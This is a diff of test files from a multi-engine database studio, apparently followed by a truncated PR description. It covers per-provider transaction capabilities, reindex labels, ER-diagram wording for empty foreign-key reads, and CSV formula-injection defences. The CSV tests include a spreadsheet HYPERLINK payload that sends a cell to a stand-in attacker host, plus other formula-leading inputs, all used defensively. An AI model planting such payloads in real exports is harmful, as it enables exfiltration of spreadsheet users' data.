+        onBeginTransaction={undefined}
+        onCommitTransaction={undefined}
+        onRollbackTransaction={undefined}
+      />,
+    );
+    expect(queryByText("COMMIT")).toBeNull();
+    expect(queryByText("ROLLBACK")).toBeNull();
+    expect(queryByText("Import Data")).not.toBeNull();
+  });
+
+  test("Enable Sandbox not rendered when onTogglePlayground is withheld (#U13)", () => {
+    const { queryByText } = render(<StudioMobileHeader {...defaults} onTogglePlayground={undefined} />);
+    expect(queryByText("Enable Sandbox")).toBeNull();
+    expect(queryByText("BEGIN Transaction")).not.toBeNull();
+    expect(queryByText("Import Data")).not.toBeNull();
+  });
+
   test("Import Data click calls onImport", () => {
     const { queryByText } = render(<StudioMobileHeader {...defaults} />);
     const item = queryByText("Import Data");

--- a/tests/evals/investigation-arc.test.ts
+++ b/tests/evals/investigation-arc.test.ts
@@ -382,9 +382,11 @@ describe("the schema's relations reach the model as their own fenced block", () 
 
     const transcript = drive.transcripts[0] ?? "";
     expect(transcript).toContain("schema relations");
-    // The sample declares no foreign keys, and the block says so rather than
-    // showing an empty list a reader could mistake for "the run did not look".
-    expect(transcript).toContain("no table in this inventory declares a foreign key");
+    // The sample's read returns no foreign key, and the block says what that does and
+    // does not establish rather than showing an empty list a reader could mistake for
+    // "the run did not look" — or for a database that has none.
+    expect(transcript).toContain("No foreign key was read for any table in this inventory");
+    expect(transcript).toContain("do not report that this database has no foreign keys");
   });
 
   test("the block is fenced, so identifiers in it are untrusted content like any other", async () => {

--- a/tests/integration/db/cassandra-provider.test.ts
+++ b/tests/integration/db/cassandra-provider.test.ts
@@ -433,6 +433,8 @@ describe("capabilities", () => {
     // amount = 1 WHERE customer_id = 3` - a plausible guess on a real table - is
     // "Some partition key parts are missing: id".
     expect(capabilities.supportsInlineRowEdit).toBe(false);
+    // CQL has no transaction; BATCH is not one (#U13).
+    expect(capabilities.supportsTransactions).toBe(false);
   });
 
   test("there are no foreign keys in the model at all", () => {

--- a/tests/integration/db/clickhouse-provider.test.ts
+++ b/tests/integration/db/clickhouse-provider.test.ts
@@ -414,6 +414,7 @@ describe("ClickHouseProvider metadata", () => {
       supportsExternalQueryLimiting: true,
       supportsCreateTable: false,
       supportsInlineRowEdit: false,
+      supportsTransactions: false,
       declaresForeignKeys: false,
       supportsMaintenance: true,
       maintenanceOperations: ["optimize", "analyze", "kill"],

--- a/tests/integration/db/couchbase-provider.test.ts
+++ b/tests/integration/db/couchbase-provider.test.ts
@@ -279,6 +279,8 @@ describe("CouchbaseProvider metadata", () => {
       supportsExternalQueryLimiting: true,
       supportsCreateTable: false,
       supportsInlineRowEdit: false,
+      // The HTTP query service is stateless per request; no session spans two of them.
+      supportsTransactions: false,
       declaresForeignKeys: false,
       supportsMaintenance: true,
       maintenanceOperations: ["analyze", "reindex", "kill"],
@@ -314,6 +316,19 @@ describe("CouchbaseProvider metadata", () => {
     expect(labels.rowName).toBe("document");
     expect(labels.rowNamePlural).toBe("documents");
     expect(labels.analyzeGlobalDesc).toContain("Enterprise");
+  });
+
+  // The Operations tab's global Reindex card was hardcoded to PostgreSQL's "Run
+  // Reindex / Rebuild Indexes / Reconstructs all indexes in the database." Couchbase's
+  // `reindex` is `BUILD INDEX` over the DEFERRED GSI indexes of one keyspace
+  // (`buildDeferredIndexes()`), so none of those three strings described it (#U6).
+  test("names the deferred GSI build, not a table reindex, in the global reindex card", () => {
+    const labels = new CouchbaseProvider(makeConnection()).getLabels();
+
+    expect(labels.reindexGlobalLabel).toBe("Build Indexes");
+    expect(labels.reindexGlobalTitle).toContain("GSI");
+    expect(labels.reindexGlobalDesc).toContain("BUILD INDEX");
+    expect(labels.reindexGlobalDesc).not.toContain("REINDEX");
   });
 
   // Until #U12 the monitoring Queries panel told a Couchbase operator to install a

--- a/tests/integration/db/druid-provider.test.ts
+++ b/tests/integration/db/druid-provider.test.ts
@@ -500,6 +500,7 @@ describe("DruidProvider metadata", () => {
       supportsExternalQueryLimiting: true,
       supportsCreateTable: false,
       supportsInlineRowEdit: false,
+      supportsTransactions: false,
       declaresForeignKeys: false,
       supportsMaintenance: false,
       maintenanceOperations: [],

--- a/tests/integration/db/elasticsearch-provider.test.ts
+++ b/tests/integration/db/elasticsearch-provider.test.ts
@@ -661,6 +661,7 @@ describe("ElasticsearchProvider metadata", () => {
       supportsExternalQueryLimiting: true,
       supportsCreateTable: false,
       supportsInlineRowEdit: false,
+      supportsTransactions: false,
       declaresForeignKeys: false,
       supportsMaintenance: false,
       maintenanceOperations: [],

--- a/tests/integration/db/libredb-provider.test.ts
+++ b/tests/integration/db/libredb-provider.test.ts
@@ -117,6 +117,8 @@ describe("LibreDBProvider — lifecycle & metadata", () => {
     // The query language is a small JSON command grammar, not SQL, so the inline
     // row editor's `UPDATE ... SET` cannot be expressed here (#269).
     expect(caps.supportsInlineRowEdit).toBe(false);
+    // The command grammar has no transaction verb at all (#U13).
+    expect(caps.supportsTransactions).toBe(false);
     // The catalog declares namespaces and columns and nothing that references
     // another namespace, so there is no foreign key to read (#414).
     expect(caps.declaresForeignKeys).toBe(false);

--- a/tests/integration/db/mongodb-provider.test.ts
+++ b/tests/integration/db/mongodb-provider.test.ts
@@ -313,6 +313,9 @@ describe("MongoDBProvider", () => {
       // No SQL at all here: the query language is JSON commands, so the inline row
       // editor's `UPDATE ... SET` has nothing to run against (#269).
       expect(caps.supportsInlineRowEdit).toBe(false);
+      // Multi-document transactions need a client session this provider does not
+      // hold, so the trio and the sandbox toggle are withheld (#U13).
+      expect(caps.supportsTransactions).toBe(false);
       // MongoDB has no foreign key constraint, so an empty `foreignKeys` here is the
       // engine's model and not this database's shape (#414).
       expect(caps.declaresForeignKeys).toBe(false);

--- a/tests/integration/db/mssql-provider.test.ts
+++ b/tests/integration/db/mssql-provider.test.ts
@@ -582,6 +582,8 @@ describe("MSSQLProvider", () => {
       // `UPDATE t SET c = v WHERE pk = v` is core T-SQL DML — the shape the inline
       // row editor builds (#269).
       expect(caps.supportsInlineRowEdit).toBe(true);
+      // The mssql Transaction object over one held pool connection (#U13).
+      expect(caps.supportsTransactions).toBe(true);
       // Inherited from the base capabilities: this engine declares foreign keys, so
       // an empty `foreignKeys` list is a fact about the schema or the role, never
       // about the engine (#414).

--- a/tests/integration/db/mysql-provider.test.ts
+++ b/tests/integration/db/mysql-provider.test.ts
@@ -485,6 +485,8 @@ describe("MySQLProvider", () => {
       // `UPDATE t SET c = v WHERE pk = v` is core MySQL DML — the shape the inline
       // row editor builds (#269).
       expect(caps.supportsInlineRowEdit).toBe(true);
+      // One held connection carries the transaction, so the trio is offered (#U13).
+      expect(caps.supportsTransactions).toBe(true);
       // Inherited from the base capabilities: this engine declares foreign keys, so
       // an empty `foreignKeys` list is a fact about the schema or the role, never
       // about the engine (#414).

--- a/tests/integration/db/opensearch-provider.test.ts
+++ b/tests/integration/db/opensearch-provider.test.ts
@@ -705,6 +705,8 @@ describe("OpenSearchProvider shares the Elasticsearch implementation", () => {
     expect(esQuoting).toBe("double");
     expect(opensearch.queryLanguage).toBe("sql");
     expect(opensearch.supportsExplain).toBe(false);
+    // Neither grammar has BEGIN and both are reached over stateless HTTP (#U13).
+    expect(opensearch.supportsTransactions).toBe(false);
     expect(opensearch.defaultPort).toBe(9200);
   });
 

--- a/tests/integration/db/oracle-provider.test.ts
+++ b/tests/integration/db/oracle-provider.test.ts
@@ -552,6 +552,8 @@ describe("OracleProvider", () => {
       // `UPDATE t SET c = v WHERE pk = v` is core Oracle DML — the shape the inline
       // row editor builds (#269).
       expect(caps.supportsInlineRowEdit).toBe(true);
+      // One held connection carries the transaction, so the trio is offered (#U13).
+      expect(caps.supportsTransactions).toBe(true);
       // Inherited from the base capabilities: this engine declares foreign keys, so
       // an empty `foreignKeys` list is a fact about the schema or the role, never
       // about the engine (#414).

--- a/tests/integration/db/postgres-provider.test.ts
+++ b/tests/integration/db/postgres-provider.test.ts
@@ -1735,6 +1735,9 @@ describe("PostgresProvider", () => {
       // `UPDATE t SET c = v WHERE pk = v` is core PostgreSQL DML — exactly the
       // statement shape the inline row editor builds (#269).
       expect(caps.supportsInlineRowEdit).toBe(true);
+      // BEGIN/COMMIT/ROLLBACK run over one held pool client here, so the toolbar's
+      // transaction trio and the sandbox toggle are offered (#U13).
+      expect(caps.supportsTransactions).toBe(true);
       // Inherited from the base capabilities: this engine declares foreign keys, so
       // an empty `foreignKeys` list is a fact about the schema or the role, never
       // about the engine (#414).
@@ -1743,6 +1746,27 @@ describe("PostgresProvider", () => {
       expect(caps.maintenanceOperations).toContain("analyze");
       expect(caps.maintenanceOperations).toContain("reindex");
       expect(caps.maintenanceOperations).toContain("kill");
+    });
+  });
+
+  // --------------------------------------------------------------------------
+  // getLabels
+  // --------------------------------------------------------------------------
+
+  describe("getLabels()", () => {
+    // The Operations tab's global reindex card was hardcoded to exactly this wording
+    // for every engine. PostgreSQL is the engine it was written for - `runMaintenance`
+    // sends `REINDEX DATABASE` with no target - so declaring it here changes nothing
+    // on this provider and lets SQLite and Couchbase say what theirs does (#U6).
+    test("declares the global reindex wording the card used to hardcode", () => {
+      const labels = new PostgresProvider(makePgConfig()).getLabels();
+
+      expect(labels.reindexGlobalLabel).toBe("Run Reindex");
+      expect(labels.reindexGlobalTitle).toBe("Rebuild Indexes");
+      expect(labels.reindexGlobalDesc).toContain("REINDEX DATABASE");
+      // The rest of the vocabulary is still the base default, not a local copy.
+      expect(labels.entityName).toBe("Table");
+      expect(labels.analyzeGlobalLabel).toBe("Run Analyze");
     });
   });
 

--- a/tests/integration/db/redis-provider.test.ts
+++ b/tests/integration/db/redis-provider.test.ts
@@ -216,6 +216,8 @@ describe("RedisProvider", () => {
       // Redis commands are not SQL, so the inline row editor's `UPDATE ... SET`
       // has nothing to run against (#269).
       expect(caps.supportsInlineRowEdit).toBe(false);
+      // MULTI/EXEC exists in Redis and is not exposed through this provider (#U13).
+      expect(caps.supportsTransactions).toBe(false);
       // Redis has no constraints at all, and its "tables" are key prefixes this
       // provider grouped rather than objects anyone declared (#414).
       expect(caps.declaresForeignKeys).toBe(false);

--- a/tests/integration/db/sqlite-provider.test.ts
+++ b/tests/integration/db/sqlite-provider.test.ts
@@ -273,6 +273,10 @@ describe("SQLiteProvider", () => {
       // `UPDATE t SET c = v WHERE pk = v` is core SQLite DML — the shape the inline
       // row editor builds (#269).
       expect(caps.supportsInlineRowEdit).toBe(true);
+      // False although SQLite HAS transactions: this provider holds no session for
+      // one, so POST /api/db/transaction refuses the call and the controls must not
+      // be offered (#U13). The flag describes the provider's surface, not the engine.
+      expect(caps.supportsTransactions).toBe(false);
       // Inherited from the base capabilities: this engine declares foreign keys, so
       // an empty `foreignKeys` list is a fact about the schema or the role, never
       // about the engine (#414).
@@ -780,6 +784,18 @@ describe("SQLiteProvider", () => {
 
       expect(slowQueriesEmptyState).toContain("SQLite keeps no statistics");
       expect(slowQueriesEmptyState).not.toContain("pg_stat_statements");
+    });
+
+    // SQLite declares the `reindex` maintenance operation and `runMaintenance()`
+    // sends a bare `REINDEX` for the global card, which rebuilds every index in the
+    // FILE - not in a database of tables the way the hardcoded copy read (#U6).
+    test("declares the global reindex wording the bare REINDEX it runs deserves", () => {
+      const labels = new SQLiteProvider(makeSQLiteConfig()).getLabels();
+
+      expect(labels.reindexGlobalLabel).toBe("Run Reindex");
+      expect(labels.reindexGlobalTitle).toBe("Rebuild Indexes");
+      expect(labels.reindexGlobalDesc).toContain("REINDEX");
+      expect(labels.reindexGlobalDesc).toContain("database file");
     });
   });
 });

--- a/tests/integration/db/trino-provider.test.ts
+++ b/tests/integration/db/trino-provider.test.ts
@@ -530,6 +530,9 @@ describe("TrinoProvider metadata", () => {
 
     expect(capabilities.declaresForeignKeys).toBe(false);
     expect(capabilities.supportsInlineRowEdit).toBe(false);
+    // Trino has START TRANSACTION, but a transaction lives in an HTTP session header
+    // this provider does not carry between statements, so the trio is withheld (#U13).
+    expect(capabilities.supportsTransactions).toBe(false);
     // These rows are real tables, not groupings this server derived.
     expect(capabilities.tablesAreDerivedGroupings).toBeUndefined();
   });

--- a/tests/isolated/agent-investigation.test.ts
+++ b/tests/isolated/agent-investigation.test.ts
@@ -1429,17 +1429,16 @@ describe("planning mode runs no statement of the user's", () => {
       });
 
       /*
-        The relations block's empty sentence hedged between "that may be how the schema
-        is" and "the keys may be enforced by the application" — two claims about a
-        database that COULD declare a foreign key and did not. This engine cannot, and
-        the third sentence says so instead of inviting a reader to wonder about a schema
-        decision nobody made.
+        An engine that declares no foreign keys and a read that saw none are different
+        facts, and the block says which one it has. On an engine with no such construct
+        the other sentence — the one about what this reading was allowed to see — would
+        report a read limit where there was nothing to read, so it must not appear.
       */
       test("an engine that cannot declare a foreign key is not described as one that declared none", async () => {
         const { transcript } = await planOnProvider("json");
 
         expect(transcript).toContain("this engine does not declare foreign keys at all");
-        expect(transcript).not.toContain("That may be how the schema is");
+        expect(transcript).not.toContain("not the same as there being none");
       });
 
       /*
@@ -1758,8 +1757,8 @@ describe("planning mode runs no statement of the user's", () => {
      *
      * The relations half was missing when this fixture was first written, and the test
      * below passed for the wrong reason: with no foreign keys, `renderErDiagram`
-     * short-circuits to its "no table declares a foreign key" branch and its notice is
-     * never rendered at all — so an assertion that no tool is named certified a property
+     * short-circuits to its empty-read branch and its omission notice is never rendered
+     * at all — so an assertion that no tool is named certified a property
      * the code did not have. Found by review on #411.
      */
     const wideCatalog = async (sql: string): Promise<QueryResult> => {
@@ -2264,7 +2263,7 @@ describe("planning mode runs no statement of the user's", () => {
     "Apply to editor" control reads SQL out of a fence in the browser — it works when
     the model fences its SQL and silently offers nothing when it does not — so plan
     mode's entire deliverable was recorded nowhere and could be checked by nothing
-    (`docs/BACKLOG.md` B44).
+    at all.
 
     What is asserted here is the wiring and, as carefully, its limits: an unknown
     table is RECORDED and the statement is still offered, a write is MARKED and still

--- a/tests/unit/db/base-provider.test.ts
+++ b/tests/unit/db/base-provider.test.ts
@@ -17,6 +17,7 @@ import type {
   IndexStats,
   StorageStats,
   ProviderCapabilities,
+  ProviderLabels,
 } from "@/lib/db/types";
 
 // ============================================================================
@@ -224,6 +225,11 @@ describe("BaseDatabaseProvider", () => {
       expect(caps.supportsExternalQueryLimiting).toBe(true);
       expect(caps.supportsCreateTable).toBe(true);
       expect(caps.supportsInlineRowEdit).toBe(true);
+      // The opposite default to the line above, and deliberately: this class
+      // implements no transaction methods, so a subclass that does not add them has
+      // none and POST /api/db/transaction refuses the call. Only the four providers
+      // that hold a session for one declare `true` (#U13).
+      expect(caps.supportsTransactions).toBe(false);
       // Compile-time pin, checked by `bun run typecheck`: `ProviderCapabilities` is
       // published (`src/exports/types.ts`), so a capability added later must be
       // OPTIONAL or every external implementer of the type stops compiling. Omitting
@@ -241,6 +247,7 @@ describe("BaseDatabaseProvider", () => {
         schemaRefreshPattern: "",
       };
       expect(externalImplementer.supportsInlineRowEdit).toBeUndefined();
+      expect(externalImplementer.supportsTransactions).toBeUndefined();
       expect(externalImplementer.declaresForeignKeys).toBeUndefined();
       // The SQL default: a relational engine HAS foreign keys whether or not a given
       // schema uses any. The six engines that have none override it, so the strong
@@ -280,6 +287,38 @@ describe("BaseDatabaseProvider", () => {
       expect(labels.rowNamePlural).toBe("rows");
       expect(labels.selectAction).toBe("Select Top 50");
       expect(labels.searchPlaceholder).toBe("Search tables or columns...");
+    });
+
+    test("declares no global reindex wording, so the Operations card keeps its fallback", () => {
+      // The `reindexGlobal*` triad is OPTIONAL on the published `ProviderLabels`
+      // (`src/exports/types.ts`), unlike the analyze and vacuum triads beside it: a
+      // required field added after the fact stops every external implementer of the
+      // type compiling. Only the three providers that declare the `reindex`
+      // maintenance operation set it, and `OperationsTab` falls back to the wording
+      // the card had (#U6). The literal below is the compile-time half of that,
+      // checked by `bun run typecheck`.
+      const externalImplementer: ProviderLabels = {
+        entityName: "Node",
+        entityNamePlural: "Nodes",
+        rowName: "record",
+        rowNamePlural: "records",
+        selectAction: "Read",
+        generateAction: "Generate",
+        analyzeAction: "Analyze",
+        vacuumAction: "Vacuum",
+        searchPlaceholder: "Search...",
+        analyzeGlobalLabel: "Analyze",
+        analyzeGlobalTitle: "Analyze",
+        analyzeGlobalDesc: "Analyze.",
+        vacuumGlobalLabel: "Vacuum",
+        vacuumGlobalTitle: "Vacuum",
+        vacuumGlobalDesc: "Vacuum.",
+      };
+
+      expect(externalImplementer.reindexGlobalLabel).toBeUndefined();
+      expect(externalImplementer.reindexGlobalTitle).toBeUndefined();
+      expect(externalImplementer.reindexGlobalDesc).toBeUndefined();
+      expect(new TestProvider(makeConfig()).getLabels().reindexGlobalLabel).toBeUndefined();
     });
   });
 

--- a/tests/unit/db/factory.test.ts
+++ b/tests/unit/db/factory.test.ts
@@ -435,6 +435,51 @@ describe("createDatabaseProvider", () => {
     expect(provider).toBeDefined();
     expect(provider.type).toBe("libredb");
   });
+
+  // ─── supportsTransactions agrees with the route's own shape check (#U13) ───
+  //
+  // `POST /api/db/transaction` gates on `isTransactionProvider(provider)` — the three
+  // methods being present — which no client can read, so `Studio.tsx` reads the
+  // declared capability instead. Two declarations for one fact drift, and the drift is
+  // silent in both directions: `true` without the methods puts back the HTTP 400 the
+  // capability exists to prevent, and `false` with them hides working controls. Every
+  // SHIPPED type is checked rather than a sample, since the one nobody notices is
+  // exactly the one that drifts.
+  test("every provider's supportsTransactions matches whether it implements the trio", async () => {
+    const overrides: Record<string, Partial<DatabaseConnection>> = {
+      sqlite: { database: ":memory:" },
+      mongodb: { connectionString: "mongodb://localhost/test" },
+      oracle: { serviceName: "ORCL" } as Partial<DatabaseConnection>,
+      couchbase: { port: 8091, database: "travel" },
+      elasticsearch: { port: 9200 },
+      opensearch: { port: 9200 },
+      clickhouse: { port: 8123, database: "demo" },
+      druid: { port: 8888 },
+      trino: { port: 8080, database: "tpch" },
+      cassandra: { port: 9042, database: "probe", localDataCenter: "datacenter1" } as Partial<DatabaseConnection>,
+      libredb: { database: "/tmp/test.libredb" },
+    };
+
+    const declaringTypes: string[] = [];
+    for (const type of SHIPPED_DATABASE_TYPES) {
+      const provider = (await createDatabaseProvider(makeConnection(type, overrides[type] ?? {}))) as unknown as Record<
+        string,
+        unknown
+      >;
+      const implementsTrio =
+        typeof provider.beginTransaction === "function" &&
+        typeof provider.commitTransaction === "function" &&
+        typeof provider.rollbackTransaction === "function";
+      const declared = (provider.getCapabilities as () => { supportsTransactions?: boolean })().supportsTransactions;
+
+      expect(declared).toBe(implementsTrio);
+      if (declared === true) declaringTypes.push(type);
+    }
+
+    // The positive half, pinned by name: exactly four providers hold a transaction
+    // session, so a fifth (or a lost one) fails here and not only in the loop above.
+    expect(declaringTypes.sort()).toEqual(["mssql", "mysql", "oracle", "postgres"]);
+  });
 });
 
 // ─── getOrCreateProvider — uses 'sqlite' for lightweight testing ─────

--- a/tests/unit/lib/agent/composed-sql.test.ts
+++ b/tests/unit/lib/agent/composed-sql.test.ts
@@ -151,7 +151,7 @@ describe("composeCatalogRead — the relation and index inventories (#329 T8)", 
   /**
    * The foreign-key read leaves `information_schema` for `pg_constraint`, and every
    * assertion below is a property measured on a live PostgreSQL 18 rather than a
-   * shape that reads well (`docs/BACKLOG.md` B8, B44):
+   * shape that reads well (`docs/BACKLOG.md` B8):
    *
    *  - the three `information_schema` constraint views are restricted to constraints
    *    on tables the role owns or holds a privilege on OTHER than `SELECT`, so the

--- a/tests/unit/lib/agent/er-diagram.test.ts
+++ b/tests/unit/lib/agent/er-diagram.test.ts
@@ -166,60 +166,76 @@ describe("the edge of what the run read", () => {
   });
 });
 
-describe("bounds and empty shapes", () => {
-  test("a schema with no foreign keys says so, rather than showing an empty list", () => {
-    const rendered = renderErDiagram(snapshot([table("a"), table("b")]), "minimal");
+/*
+  The three-way distinction an empty relations read has to keep.
 
-    expect(rendered).toContain("no table in this inventory declares a foreign key");
-    // And it says the other possibility, because it is a real one.
-    expect(rendered).toContain("enforced by the application");
-  });
+  A zero-row read is three different facts wearing one shape, and the run was licensed
+  to pick the wrong one: an investigation over the seeded dvdrental answered "there are
+  no declared foreign key constraints between tables in the database", confidently,
+  citing a snapshot that genuinely contained nothing because the role could not see the
+  18 keys `pg_constraint` holds. The read itself is fixed elsewhere
+  (`composePostgresRelations`); what is asserted here is that the TEXT stops licensing
+  the negative, since any role can be narrower than the database it reads.
+
+  One test per arm, and each names what the block SAYS rather than what it omits: an
+  assertion that the false sentence is absent would keep passing if this whole rendering
+  were deleted.
+*/
+describe("an empty read, an absent concept and a real graph are told apart", () => {
+  const EMPTY = snapshot([table("a"), table("b")]);
 
   /*
-    #414. The hedge above offers two explanations and both of them are claims about a
-    database that COULD have declared a foreign key and chose not to. Grounding reached
-    MongoDB, Redis, LibreDB, Druid, ClickHouse and Couchbase, where there is no such
-    construct to decline — so on those six the sentence is wrong in both branches at
-    once, and it invites a reader to wonder about a schema decision nobody made.
-
-    Driven from the provider's own capability rather than from the connection's type,
-    which `CLAUDE.md` forbids outside a provider class: six engines would have been
-    listed at this call site and the seventh forgotten.
+    #414. The arm is driven from the provider's own capability rather than from the
+    connection's type, which `CLAUDE.md` forbids outside a provider class: MongoDB,
+    Redis, LibreDB, Druid, ClickHouse and Couchbase all reach here, and a type check at
+    this call site is how six would have been listed and the seventh forgotten. On those
+    six there is no construct to decline, so the (c) sentence is wrong here too — a read
+    limit is not what is being reported.
   */
-  test("an engine that declares no foreign keys AT ALL gets its own sentence, not the hedge", () => {
-    const rendered = renderErDiagram(snapshot([table("a"), table("b")]), "minimal", {
-      engineDeclaresForeignKeys: false,
-    });
+  test("(a) an engine with no foreign-key concept says nothing could have been found", () => {
+    const rendered = renderErDiagram(EMPTY, "minimal", { engineDeclaresForeignKeys: false });
 
     expect(rendered).toContain("this engine does not declare foreign keys at all");
     expect(rendered).toContain("nothing of that kind here for a reading to have found or missed");
-    // Neither branch of the hedge survives here: both would be false.
-    expect(rendered).not.toContain("That may be how the schema is");
-    expect(rendered).not.toContain("enforced by the application rather than the database");
+    // Not the read-limit sentence: on these six engines there is no read to have missed.
+    expect(rendered).not.toContain("not the same as there being none");
+  });
+
+  test("(b) an engine that has them and a read that found rows reports the rows", () => {
+    const rendered = renderErDiagram(WITH_CUSTOMERS, "minimal", { engineDeclaresForeignKeys: true });
+
+    expect(relationLines(rendered)).toEqual(['"orders" -> "customers"']);
+    expect(rendered).not.toContain("not the same as there being none");
+    expect(rendered).not.toContain("does not declare foreign keys at all");
   });
 
   /*
-    The flag is optional on the published `ProviderCapabilities`, so an absent value is
-    a provider that has not declared either way — and the hedge is the weaker claim,
-    which is the right thing to say about an engine nobody has decided about. Anything
-    else would assert an absence out of a silence.
+    Both values take this arm, and that is the point of the loop: `declaresForeignKeys`
+    is optional on the published `ProviderCapabilities`, so an absent flag is a provider
+    that has decided nothing — and the honest sentence is the one that claims least,
+    which is the right thing to say about an engine nobody has ruled on.
   */
-  test("a provider that says nothing about it keeps the hedge, and one that says true keeps it too", () => {
+  test("(c) an engine that has them and a read that found none refuses to assert the negative", () => {
     for (const declares of [undefined, true]) {
-      const rendered = renderErDiagram(snapshot([table("a"), table("b")]), "minimal", {
+      const rendered = renderErDiagram(EMPTY, "minimal", {
         ...(declares === undefined ? {} : { engineDeclaresForeignKeys: declares }),
       });
+      const because = String(declares);
 
-      expect(rendered, String(declares)).toContain("no table in this inventory declares a foreign key");
-      expect(rendered, String(declares)).not.toContain("does not declare foreign keys at all");
+      // What it says: the read's limit, the reason, and the instruction that follows.
+      expect(rendered, because).toContain("No foreign key was read for any table in this inventory");
+      expect(rendered, because).toContain("not the same as there being none");
+      expect(rendered, because).toContain("a role narrower than the database reads an empty graph");
+      expect(rendered, because).toContain("do not report that this database has no foreign keys");
+      expect(rendered, because).toContain("inferred from names rather than declared");
+      // And only then the negatives: neither of the other two arms' sentences.
+      expect(rendered, because).not.toContain("does not declare foreign keys at all");
+      expect(rendered, because).not.toContain("declares a foreign key.");
     }
   });
+});
 
-  /*
-    The sentence is only reached when there is nothing to show. An engine that declares
-    no foreign keys and an inventory that somehow carries one is a contradiction the
-    RELATIONS win: what was read is more informative than what was declared possible.
-  */
+describe("bounds and empty shapes", () => {
   /*
     #414, second finding. An engine that declares no foreign keys is usually one whose
     inventory rows are not tables either, so the two sentences above named something the
@@ -236,9 +252,9 @@ describe("bounds and empty shapes", () => {
     expect(cannotDeclare).toContain("Whatever relates these key patterns to each other");
     expect(cannotDeclare).not.toContain("table");
 
-    const declaredNone = renderErDiagram(rows, "minimal", { noun });
-    expect(declaredNone).toContain("no key pattern in this inventory declares a foreign key");
-    expect(declaredNone).not.toContain("no table in this inventory");
+    const readNone = renderErDiagram(rows, "minimal", { noun });
+    expect(readNone).toContain("No foreign key was read for any key pattern in this inventory");
+    expect(readNone).not.toContain("any table in this inventory");
   });
 
   /*

--- a/tests/unit/lib/export/csv.test.ts
+++ b/tests/unit/lib/export/csv.test.ts
@@ -35,6 +35,33 @@ describe("csvRow", () => {
   test("writes a boolean and a bigint as themselves", () => {
     expect(csvRow([true, false, BigInt(10)])).toBe("true,false,10");
   });
+
+  test("neutralises every leading character a spreadsheet reads as the start of a formula", () => {
+    expect(csvRow(['=HYPERLINK("http://attacker/"&A1)'])).toBe(`"'=HYPERLINK(""http://attacker/""&A1)"`);
+    expect(csvRow(["+1+1"])).toBe(`"'+1+1"`);
+    expect(csvRow(["-1+1"])).toBe(`"'-1+1"`);
+    expect(csvRow(["@SUM(A1)"])).toBe(`"'@SUM(A1)"`);
+    expect(csvRow(["\t=1+1"])).toBe(`"'\t=1+1"`);
+    expect(csvRow(["\r=1+1"])).toBe(`"'\r=1+1"`);
+  });
+
+  test("leaves a number alone, however it arrives, because a bare decimal cannot be a formula", () => {
+    expect(csvRow([-12.5, 12.5, BigInt(-10)])).toBe("-12.5,12.5,-10");
+    // A Postgres `numeric` reaches the export as a string, so the exemption is on the
+    // TEXT and not on the JavaScript type.
+    expect(csvRow(["-12.5", "-1e3", "+7", "-.5", "-1E+03"])).toBe("-12.5,-1e3,+7,-.5,-1E+03");
+  });
+
+  test("neutralises a value that only starts out numeric", () => {
+    expect(csvRow(["-1-2-3"])).toBe(`"'-1-2-3"`);
+    expect(csvRow(["-12.5.6"])).toBe(`"'-12.5.6"`);
+    expect(csvRow(["-"])).toBe(`"'-"`);
+  });
+
+  test("writes an ordinary value byte-identically, prefix and quotes included", () => {
+    expect(csvRow(["plain", "a=b", "3-4", "user@example.com", "", null])).toBe("plain,a=b,3-4,user@example.com,,");
+    expect(csvRow(["Acme, Inc."])).toBe('"Acme, Inc."');
+  });
 });
 
 describe("toCsv", () => {
@@ -62,6 +89,10 @@ describe("toCsv", () => {
   test("leaves a column a row does not carry empty rather than shifting the ones after it", () => {
     const csv = toCsv([{ a: 1, c: 3 }], ["a", "b", "c"]);
     expect(csv).toBe("a,b,c\n1,,3");
+  });
+
+  test("neutralises a column name a spreadsheet would evaluate, not only a cell", () => {
+    expect(toCsv([{ "=1+1": "plain" }])).toBe(`"'=1+1"\nplain`);
   });
 
   test("quotes a column name that needs it", () => {


### PR DESCRIPTION
Round 3 of the backlog sweep. Seven entries closed, one deduplicated, one sharpened with a
measured fact. BACKLOG **116 -> 109**.

Two commits, reviewable independently:

- `251463e8` the six behaviour/copy items
- `6f99209c` the lucide icon rename, which is mechanical and touches 43 files on its own

## What each item was, and what changed

### U13 - eight engines rendered BEGIN and got HTTP 400

`Studio.tsx` handed `QueryToolbar` the transaction trio unconditionally, so
BEGIN/COMMIT/ROLLBACK and SANDBOX rendered on every connection while
`POST /api/db/transaction` answered *"Transaction control is not supported for this database
type"*. The server gated on `isTransactionProvider()`, a runtime shape check no client can read.

`ProviderCapabilities` now carries an optional `supportsTransactions`, declared at all 14
provider declaration sites and true only on the four that implement `beginTransaction`. Both
callers gate on `=== true`. Optional rather than required for the reason `supportsInlineRowEdit`
already records in its own doc comment: the interface is published, so a newly required field
stops every external implementer compiling.

**Measured live before the work started**, not assumed: `grep` proves postgres, mysql, oracle
and mssql are the only four files implementing `beginTransaction` - notably sqlite and libredb
are not.

### U6 - the Reindex card spoke Postgres to everyone

`ProviderLabels` gains a `reindexGlobal*` triad, set by the three providers that declare the
operation, with the old hardcoded strings as fallback. The per-table half stays with U9.

U9 also gains a third mismatch measured while doing this: Couchbase's global Reindex card cannot
succeed at any wording, because `dispatchMaintenance()` routes `reindex` through
`requireTarget()` while the card sends no target. The behaviour was deliberately left alone -
U9's reverted mapping is the precedent for not building a control that always fails.

### U4 - a failed data profile trapped the user

`DataProfiler` is a hand-rolled `fixed inset-0` overlay rather than a `ui/dialog`. That one fact
is the whole defect: nothing bound Escape, and the icon-only close control had no accessible
name and sat in a header the error card could overflow. Both fixed. The overlay stays
hand-rolled on purpose - a Radix portal would move the card out of the
`[data-studio-workspace]` subtree the embedded surface styles by descendant selector.

### X1 - a CSV cell beginning `=`, `+`, `-` or `@` is a formula to a spreadsheet

Neutralization is now unconditional: no setting, no checkbox. It is the one non-faithful line in
`src/lib/export/csv.ts` and the module header says so.

**Measured on LibreOffice 24.2.7.2** (CSV -> ODS, reading `table:formula` in `content.xml`):
`=1+1` imports as a live formula; the apostrophe prefix neutralizes it. `-12.5` and `-1e3`
import as floats, so a value that is a plain number and nothing else is exempt - anchored at
both ends, so an exempt value provably contains no operator, call or cell reference. The
exemption is on the TEXT rather than the JS type, because Postgres returns `numeric` as a string.

Tab and CR are in the danger set because they are consumed before the next character is judged,
so they smuggle a formula past a position-0 check.

### B44 (second half) - an empty relations read no longer licenses "there are no foreign keys"

The first half shipped in #463. The rest is a wording-and-a-branch change in `renderErDiagram`,
which now states the limit of what it read and tells the model to treat a join it relies on as
inferred from names rather than declared. Three arms, one test each: the engine has no
